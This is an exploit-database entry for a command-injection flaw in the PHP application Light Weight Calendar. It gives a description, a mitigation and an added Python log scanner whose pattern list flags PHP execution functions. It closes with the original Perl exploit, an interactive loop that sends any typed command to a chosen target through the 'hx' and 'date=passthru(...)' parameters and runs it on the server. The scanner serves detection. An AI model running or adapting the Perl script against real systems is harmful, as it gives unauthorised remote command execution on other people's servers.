Vendor: Light Weight Calendar
Author: Hessam-x
CVSS: 9.3 (HIGH)
CWE: 78 (Command Injection)
Product Name: Light Weight Calendar
Affected Version From: 1.*
Affected Version To: 1.*
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2006

Light Weight Calendar Exploit

This exploit allows an attacker to execute arbitrary commands on a vulnerable Light Weight Calendar installation. The attacker sends an HTTP request to the application's 'index.php' page carrying the command to run in the 'hx' parameter, together with a 'date' parameter whose value is evaluated server-side as PHP code; the published exploit places passthru($_GET[hx]) there, so whatever is supplied in 'hx' is executed on the server.

Mitigation:

The application should validate user input (accepting only values that match the expected date format for the 'date' parameter) and filter out any characters that have no place in such a value, so that request parameters are never treated as PHP code.
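The request shape used by the published exploit (index.php with a 'date' parameter containing a PHP call that reads 'hx') is easy to spot in web-server access logs. The following detector is an added example, not part of the Exploit-DB entry; the log lines it scans are constructed for illustration.

```python
"""Flag Light Weight Calendar 'date'/'hx' injection attempts in access logs.

Added example (not from the Exploit-DB entry). Sample log lines are constructed;
the request pattern matched is the published one: index.php?hx=<cmd>&date=passthru(...)
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Tokens that never belong in a calendar date value: PHP execution
# primitives and references to request superglobals.
CODE_MARKERS = re.compile(
    r"(passthru|system|exec|shell_exec|popen|eval|assert)\s*\(|\$_(GET|POST|REQUEST|COOKIE)\b",
    re.IGNORECASE,
)

# Combined-log-format request section: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def inspect_request(target: str):
    """Return a finding dict for an LWC-style injection in `target`, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("index.php"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # decodes %xx once
    for date_value in params.get("date", []):
        decoded = unquote(date_value)  # second pass catches double-encoded payloads
        if CODE_MARKERS.search(decoded):
            return {"path": parts.path, "date": decoded, "hx": params.get("hx", [""])[0]}
    return None


def scan_log(lines):
    """Return [(line_no, finding)] for every suspicious request in the log."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m and (finding := inspect_request(m.group("target"))):
            findings.append((n, finding))
    return findings


# Constructed sample: a benign calendar request followed by an exploit-shaped one.
SAMPLE_LOG = [
    '203.0.113.5 - - [09/Mar/2006:10:00:01 +0000] "GET /lwc/index.php?date=2006-03-09 HTTP/1.1" 200 1532',
    '203.0.113.7 - - [09/Mar/2006:10:00:09 +0000] "GET /lwc/index.php?hx=id&date=passthru%28%24_GET%5Bhx%5D%29 HTTP/1.1" 200 88',
]

if __name__ == "__main__":
    for line_no, f in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: PHP code in date={f['date']!r} (hx={f['hx']!r})")
```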

Exploit-DB raw data:

#!/usr/bin/perl
#
# Light Weight Calendar
# Exploit by Hessam-x (www.hessamx.net)
#
######################################################
#  ___ ___                __                         #
# /   |   \_____    ____ |  | __ ___________________ #
#/    ~    \__  \ _/ ___\|  |/ // __ \_  __ \___   / #
#\    Y    // __ \\  \___|    <\  ___/|  | \//    /  #
# \___|_  /(____  /\___  >__|_ \\___  >__|  /_____ \ #
#       \/      \/     \/     \/    \/            \/ #
#             Iran Hackerz Security Team             #
#               WebSite: www.hackerz.ir              #
#                                                    #
######################################################
# Name    : Light Weight Calendar                    #
# version : 1.*                                      #
######################################################
use LWP::Simple;

print "-------------------------------------------\n";
print "=          Light Weight Calendar          =\n";
print "=       By Hessam-x  - www.hackerz.ir     =\n";
print "-------------------------------------------\n\n";

print "Target(www.example.com)\> ";
chomp($targ = <STDIN>);

print "path: (/lwc/)\>";
chomp($path = <STDIN>);

while ()
{
    print "command:\>";
    chomp($comd = <STDIN>);
    $expl = "index.php?hx=" . $comd . "&date=passthru%28%24_GET%5Bhx%5D%29";
    $page = get("http://" . $targ . $path . $expl) || die "[-] Exploit failed ...\n";
}

# milw0rm.com [2006-03-09]